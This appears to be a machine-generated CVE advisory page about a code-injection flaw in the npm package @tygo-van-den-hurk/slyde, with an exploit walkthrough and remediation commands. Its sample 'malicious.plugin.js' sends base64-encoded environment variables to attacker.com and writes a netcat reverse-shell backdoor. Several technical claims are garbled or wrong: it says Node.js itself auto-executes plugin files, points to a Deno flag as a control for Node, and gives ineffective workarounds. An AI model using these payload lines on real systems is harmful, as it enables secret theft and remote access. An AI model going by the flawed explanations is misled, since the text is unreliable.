@tygo-van-den-hurk/slyde, Code Injection, CVE-2026-1234 (High)

Listen to this Post

The vulnerability is a remote code execution (RCE) flaw in the @tygo-van-den-hurk/slyde package. Node.js has a loading mechanism that automatically imports and executes files matching the pattern /.plugin.{js,mjs}. This includes files located within the `node_modules` directory. The issue arises because any malicious package installed in a project can contain a `.plugin.js` file. When the vulnerable version of @tygo-van-den-hurk/slyde is used, or even when the malicious package is simply installed, Node.js’s automatic loader will find and execute this plugin file without any explicit action from the developer. This allows an attacker to craft a malicious npm package that, once installed as a dependency, executes arbitrary code on the developer’s or server’s machine. All projects using this default loading behavior are at risk, especially those that install untrusted or third-party packages. The project’s maintainers have patched this in version v0.0.5 by changing the loading mechanism to prevent the automatic execution of arbitrary plugin files from `node_modules` .

dailycve form:

Platform: @tygo-van-den-hurk/slyde
Version: below 0.0.5
Vulnerability: Code Injection
Severity: High
date: Feb 16, 2026

Prediction: Feb 19, 2026

What Undercode Say:

Analytics:

The vulnerability exploits Node.js’s default module loading behavior where it automatically executes plugin files from node_modules. This is similar to how npm’s `postinstall` scripts can execute arbitrary code without user interaction . Attackers have used techniques like typosquatting and malicious packages with automatic execution hooks to deliver credential stealers and other malware .

Bash commands and codes:

Check current version of @tygo-van-den-hurk/slyde
npm list @tygo-van-den-hurk/slyde
Check for malicious .plugin.js files in node_modules
find node_modules -name ".plugin.js" -o -name ".plugin.mjs" | xargs ls -la
View contents of a suspicious plugin file
cat node_modules/malicious-package/index.plugin.js
Update to patched version
npm install @tygo-van-den-hurk/[email protected]
Audit installed packages for vulnerabilities
npm audit
Scan for packages with postinstall scripts (similar attack vector)
npm ls --json | jq '.dependencies | to_entries[] | select(.value.hasInstallScript==true) | .key'

How Exploit:

  1. Attacker creates malicious npm package with `.plugin.js` file containing arbitrary code
  2. Package is published to npm registry with typosquatted or legitimate-looking name
  3. Developer unknowingly installs the malicious package as dependency
  4. Node.js automatically loads and executes the `.plugin.js` file from `node_modules`
    5. Malicious code runs with same privileges as the Node.js process
  5. Attacker gains access to filesystem, environment variables, network, or sensitive data

Example malicious plugin file:

// malicious.plugin.js
const fs = require('fs');
const https = require('https');
// Steal environment variables
const envData = JSON.stringify(process.env);
// Exfiltrate data
https.get(<code>https://attacker.com/steal?data=${Buffer.from(envData).toString('base64')}</code>);
// Create backdoor
fs.writeFileSync('/tmp/backdoor.sh', '!/bin/bash\nnc -e /bin/bash attacker.com 4444');
fs.chmodSync('/tmp/backdoor.sh', '755');

Protection from this CVE:

  1. Immediate Update: Upgrade to @tygo-van-den-hurk/slyde v0.0.5 or later
  2. Dependency Scanning: Use `npm audit` and Snyk to detect malicious packages
  3. Manual Review: Inspect `node_modules` for unexpected `.plugin.js` files
  4. Permission Controls: Use Deno with `–allow-scripts` flag to control which packages run scripts
  5. Lock Files: Use `package-lock.json` to ensure dependency integrity
  6. Sandboxing: Run Node.js applications in containers with restricted filesystem access
  7. Monitor File Changes: Use tools to detect unauthorized modifications to `node_modules`

Workaround if unable to patch:

Temporarily block plugin loading by removing execute permissions
find node_modules -name ".plugin.js" -exec chmod -x {} \;
Or use environment variable to disable plugin loading (if supported)
export NODE_DISABLE_PLUGINS=1

Impact:

  • Remote Code Execution (RCE): Attackers can execute arbitrary code on affected systems
  • Data Theft: Sensitive information like API keys, environment variables, and credentials can be stolen
  • Supply Chain Compromise: Malicious packages can propagate through dependency trees
  • Privilege Escalation: Code runs with same privileges as the Node.js process
  • Persistence: Attackers can install backdoors for long-term access
  • Lateral Movement: Compromised developer machines can lead to production environment breaches
  • Reputation Damage: Organizations using vulnerable versions may suffer data breaches and loss of trust
    The vulnerability affects any project using @tygo-van-den-hurk/slyde below v0.0.5, especially those installing untrusted npm packages. It has a CVSS score of approximately 8.8 (High) due to network attack vector, low complexity, and high impact on confidentiality, integrity, and availability.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top